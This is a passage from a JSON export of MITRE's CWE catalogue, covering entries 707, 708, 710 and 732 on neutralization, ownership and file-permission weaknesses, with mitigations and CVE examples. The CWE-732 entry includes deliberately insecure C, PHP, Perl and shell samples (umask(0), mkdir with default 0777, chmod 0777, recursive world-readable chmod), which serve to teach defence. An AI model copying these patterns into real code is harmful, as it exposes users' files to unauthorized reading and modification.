Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"707":{"attr":{"@_ID":"707","@_Name":"Improper Neutralization","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component.","Extended_Description":{"xhtml:p":["If a message is malformed, it may cause the message to be incorrectly interpreted.","Neutralization is an abstract term for any technique that ensures that input (and output) conforms with expectations and is \\"safe.\\"  This can be done by:","This weakness typically applies in cases where the product prepares a control message that another process must act on, such as a command or query, and malicious input that was intended as data, can enter the control plane instead. However, this weakness also applies to more general cases where there are not always control implications."],"xhtml:ul":{"xhtml:li":["checking that the input/output is already \\"safe\\" (e.g. validation)","transformation of the input/output to be \\"safe\\" using techniques such as filtering, encoding/decoding, escaping/unescaping, quoting/unquoting, or canonicalization","preventing the input/output from being directly provided by an attacker (e.g. \\"indirect selection\\" that maps externally-provided values to internally-controlled values)","preventing the input/output from being processed at all"]}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"276"}},{"attr":{"@_CAPEC_ID":"277"}},{"attr":{"@_CAPEC_ID":"278"}},{"attr":{"@_CAPEC_ID":"279"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"33"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"468"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"84"}}]},"Notes":{"Note":{"#text":"Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Failure to Enforce that Messages or Data are Well-Formed","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Enforcement of Message or Data Structure","attr":{"@_Date":"2020-02-24"}}]}},"708":{"attr":{"@_ID":"708","@_Name":"Incorrect Ownership Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software assigns an owner to a resource, but the owner is outside of the intended control sphere.","Extended_Description":"This may allow the resource to be manipulated by actors outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"282","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"345","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"],"Note":"An attacker could read and modify data for which they do not have permissions to access directly."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Policy","Description":"Periodically review the privileges and their owners."},{"Phase":"Testing","Description":"Use automated tools to check for privilege settings."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5101","Description":"File system sets wrong ownership and group when creating a new file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5101"},{"Reference":"CVE-2007-4238","Description":"OS installs program with bin owner/group, allowing modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4238"},{"Reference":"CVE-2007-1716","Description":"Manager does not properly restore ownership of a reusable resource when a user logs out, allowing privilege escalation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1716"},{"Reference":"CVE-2005-3148","Description":"Backup software restores symbolic links with incorrect uid/gid.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3148"},{"Reference":"CVE-2005-1064","Description":"Product changes the ownership of files that a symlink points to, instead of the symlink itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1064"},{"Reference":"CVE-2011-1551","Description":"Component assigns ownership of sensitive directory tree to a user account, which can be leveraged to perform privileged operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1551"}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This overlaps verification errors, permissions, and privileges.","A closely related weakness is the incorrect assignment of groups to a resource. It is not clear whether it would fall under this entry or require a different entry."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"710":{"attr":{"@_ID":"710","@_Name":"Improper Adherence to Coding Standards","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Document and closely follow coding standards."},{"Phase":["Testing","Implementation"],"Description":"Where possible, use automated tools to enforce the standards."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"}],"Previous_Entry_Name":{"#text":"Coding Standards Violation","attr":{"@_Date":"2017-11-08"}}}},"732":{"attr":{"@_ID":"732","@_Name":"Incorrect Permission Assignment for Critical Resource","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.","Extended_Description":"When a resource is given a permissions setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution or sensitive user data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","The developer might make certain assumptions about the environment in which the product operates - e.g., that the software is running on a single-user system, or the software is only accessible to trusted administrators. When the software is running in a different environment, the permissions become a problem."]}},{"Phase":"Installation","Note":"The developer may set loose permissions in order to minimize problems when the user first runs the program, then create documentation stating that permissions should be tightened. Since system administrators and users do not always read the documentation, this can result in insecure permissions being left unchanged."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker may be able to read sensitive information from the associated resource, such as credentials or configuration information stored in a file."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to modify critical properties of the associated resource to gain privileges, such as replacing a world-writable executable with a Trojan horse."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"An attacker may be able to destroy or corrupt critical data in the associated resource, such as deletion of records from a database."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc. Automated techniques may be able to detect the use of library functions that modify permissions, then analyze function calls for arguments that contain potentially insecure values.","However, since the software\'s intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated static analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes.","When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated static analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments."]}},{"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["Automated dynamic analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc.","However, since the software\'s intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated dynamic analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes.","When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated dynamic analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments."]}},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Static Analysis","Description":"Manual static analysis may be effective in detecting the use of custom permissions models and functions. The code could then be examined to identifying usage of the related functions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software."},{"Method":"Manual Dynamic Analysis","Description":"Manual dynamic analysis may be effective in detecting the use of custom permissions models and functions. The program could then be executed with a focus on exercising code paths that are related to the custom permissions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software."},{"Method":"Fuzzing","Description":"Fuzzing is not effective in detecting this weakness."},{"attr":{"@_Detection_Method_ID":"DM-11.1"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and watch for library functions or system calls on OS resources such as files, directories, and shared memory. Examine the arguments to these calls to infer which permissions are being used."]},"Effectiveness_Notes":"Note that this technique is only useful for permissions issues related to system resources. It is not likely to detect application-level business rules that are related to permissions, such as if a user of a blog system marks a post as \\"private,\\" but the blog system inadvertently marks it as \\"public.\\""},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inter-application Flow Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria","Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Forced Path Execution"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When using a critical resource such as a configuration file, check to see if the resource has insecure permissions (such as being modifiable by any regular user) [REF-62], and generate an error or even exit the software if there is a possibility that the resource could have been modified by an unauthorized party."},{"Phase":"Architecture and Design","Description":"Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully defining distinct user groups, privileges, and/or roles. Map these against data, functionality, and the related resources. Then set the permissions accordingly. This will allow you to maintain more fine-grained control over your resources. [REF-207]","Effectiveness":"Moderate","Effectiveness_Notes":"This can be an effective strategy. However, in practice, it may be difficult or time consuming to define these areas when there are many different resources or user types, or if the applications features change rapidly."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"Phase":["Implementation","Installation"],"Description":"During program startup, explicitly set the default permissions or umask to the most restrictive setting possible. Also set the appropriate permissions during program installation. This will prevent you from inheriting insecure permissions from any user who installs or runs the program.","Effectiveness":"High"},{"Phase":"System Configuration","Description":"For all configuration files, executables, and libraries, make sure that they are only readable and writable by the software\'s administrator.","Effectiveness":"High"},{"Phase":"Documentation","Description":"Do not suggest insecure configuration changes in documentation, especially if those configurations can extend to resources and other programs that are outside the scope of the application."},{"Phase":"Installation","Description":"Do not assume that a system administrator will manually change the configuration to the settings that are recommended in the software\'s manual."},{"attr":{"@_Mitigation_ID":"MIT-37"},"Phase":["Operation","System Configuration"],"Strategy":"Environment Hardening","Description":"Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code sets the umask of the process to 0 before creating a file and writing \\"Hello world\\" into the file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define OUTFILE \\"hello.out\\"umask(0);FILE *out;out = fopen(OUTFILE, \\"w\\");if (out) {}","xhtml:br":["","","","","","",""],"xhtml:i":"/* Ignore CWE-59 (link following) for brevity */","xhtml:div":{"#text":"fprintf(out, \\"hello world!\\\\n\\");fclose(out);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-rw-rw- 1 username 13 Nov 24 17:58 hello.out"}],"Body_Text":["After running this program on a UNIX system, running the \\"ls -l\\" command might return the following output:","The \\"rw-rw-rw-\\" string indicates that the owner, group, and world (all users) can read the file and write to it."]},{"Intro_Text":"This code creates a home directory for a new user, and makes that user the owner of the directory. If the new directory cannot be owned by the user, the directory is deleted.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createUserDir($username){}","xhtml:div":{"#text":"$path = \'/home/\'.$username;if(!mkdir($path)){}if(!chown($path,$username)){}return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"return false;","attr":{"@_style":"margin-left:10px;"}},{"#text":"rmdir($path);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}},"Body_Text":["Because the optional \\"mode\\" argument is omitted from the call to mkdir(), the directory is created with the default permissions 0777. Simply setting the new user as the owner of the directory does not explicitly change the permissions of the directory, leaving it with the default. This default allows any user to read and write to the directory, allowing an attack on the user\'s files. The code also fails to change the owner group of the directory, which may result in access by unexpected groups.","This code may also be vulnerable to Path Traversal (CWE-22) attacks if an attacker supplies a non alphanumeric username."]},{"Intro_Text":"The following code snippet might be used as a monitor to periodically record whether a web site is alive. To ensure that the file can always be modified, the code uses chmod() to make the file world-writable.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$fileName = \\"secretFile.out\\";if (-e $fileName) {}my $outFH;if (! open($outFH, \\"&gt;&gt;$fileName\\")) {}my $dateString = FormatCurrentTime();my $status = IsHostAlive(\\"cwe.mitre.org\\");print $outFH \\"$dateString cwe status: $status!\\\\n\\";close($outFH);","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"chmod 0777, $fileName;","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Couldn\'t append to $fileName: $!\\");","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-r--r-- 1 username 13 Nov 24 17:58 secretFile.out"},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-rw-rw- 1 username 13 Nov 24 17:58 secretFile.out"}],"Body_Text":["The first time the program runs, it might create a new file that inherits the permissions from its environment. A file listing might look like:","This listing might occur when the user has a default umask of 022, which is a common setting. Depending on the nature of the file, the user might not have intended to make it readable by everyone on the system.","The next time the program runs, however - and all subsequent executions - the chmod will set the file\'s permissions so that the owner, group, and world (all users) can read the file and write to it:","Perhaps the programmer tried to do this because a different process uses different permissions that might prevent the file from being updated."]},{"Intro_Text":"The following command recursively sets world-readable permissions for a directory and all of its children:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Shell"},"xhtml:div":"chmod -R ugo+r DIRNAME"},"Body_Text":"If this command is run from a program, the person calling the program might not expect that all the files under the directory will be world-readable. If the directory is expected to contain private data, this could become a security problem."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3482","Description":"Anti-virus product sets insecure \\"Everyone: Full Control\\" permissions for files under the \\"Program Files\\" folder, allowing attackers to replace executables with Trojan horses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3482"},{"Reference":"CVE-2009-3897","Description":"Product creates directories with 0777 permissions at installation, allowing users to gain privileges and access a socket used for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3897"},{"Reference":"CVE-2009-3489","Description":"Photo editor installs a service with an insecure security descriptor, allowing users to stop or start the service, or execute commands as SYSTEM.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3489"},{"Reference":"CVE-2020-15708","Description":"socket created with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15708"},{"Reference":"CVE-2009-3289","Description":"Library function copies a file to a new target and uses the source file\'s permissions for the target, which is incorrect when the source file is a symbolic link, which typically has 0777 permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3289"},{"Reference":"CVE-2009-0115","Description":"Device driver uses world-writable permissions for a socket file, allowing attackers to inject arbitrary commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0115"},{"Reference":"CVE-2009-1073","Description":"LDAP server stores a cleartext password in a world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1073"},{"Reference":"CVE-2009-0141","Description":"Terminal emulator creates TTY devices with world-writable permissions, allowing an attacker to write to the terminals of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0141"},{"Reference":"CVE-2008-0662","Description":"VPN product stores user credentials in a registry key with \\"Everyone: Full Control\\" permissions, allowing attackers to steal the credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0662"},{"Reference":"CVE-2008-0322","Description":"Driver installs its device interface with \\"Everyone: Write\\" permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0322"},{"Reference":"CVE-2009-3939","Description":"Driver installs a file with world-writable permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939"},{"Reference":"CVE-2009-3611","Description":"Product changes permissions to 0777 before deleting a backup; the permissions stay insecure for subsequent backups.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3611"},{"Reference":"CVE-2007-6033","Description":"Product creates a share with \\"Everyone: Full Control\\" permissions, allowing arbitrary program execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6033"},{"Reference":"CVE-2007-5544","Description":"Product uses \\"Everyone: Full Control\\" permissions for memory-mapped files (shared memory) in 